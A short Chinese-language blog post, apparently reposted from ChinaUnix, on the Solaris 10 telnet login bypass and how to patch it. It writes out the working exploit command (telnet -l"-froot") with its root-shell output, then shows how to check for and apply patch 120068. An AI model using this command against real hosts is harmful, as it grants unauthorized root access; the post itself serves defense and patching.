Solaris 10 Telnet漏洞
solaris 10的telnet漏洞好象实在可怕,没打补丁的话,就死翘翘了,估计报漏洞出来时又多了不少肉鸡 :)好,接下来我们来将telnet的漏洞现象和解决方法:
# telnet -l"-froot" xx.xx.xx.xx
Trying xx.xx.xx.xx...
Connected to qing (xx.xx.xx.xx).
Escape character is '^]'.
Last login: Thu Apr5 09:04:29 from xx.xx.xx.xx
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
#
用telnet -l "-fbin" ip 的话只能得到普通用户,-froot直接用root登陆进去了.
解决办法:
首先你要看看自己的机器是否打上了相应的补丁:
# showrev -p | grep 120068
Patch: 120068-01 Obsoletes:Requires:Incompatibles:Packages: SUNWtnetd
Patch: 120068-03 Obsoletes:Requires:Incompatibles:Packages: SUNWtnetd
我这上面是打了补丁,如果grep没找到的话,那就是没打上补丁,如果你没打上补丁,一定要接着往下看 :)
首先到sun的网站上
http://sunsolve.sun.com/private-cgi/show.pl?target=patchpage
查找120068-03的补丁,下载到机器上,把补丁及时打上就OK!
# unzip 120068-03.zip
# patchadd 120068-03
OK!补丁已经打上了.
在次telnet试试:
# telnet -l"-froot" xx.xx.xx.xx
Trying xx.xx.xx.xx...
Connected to qing (xx.xx.xx.xx).
Escape character is '^]'.
Password:
需要密码了,搞定,呵呵!没打上补丁的朋友赶紧打上。。。
本文来自ChinaUnix博客,如果查看原文请点:http://blog.chinaunix.net/u/25055/showart_271241.html
页:
[1]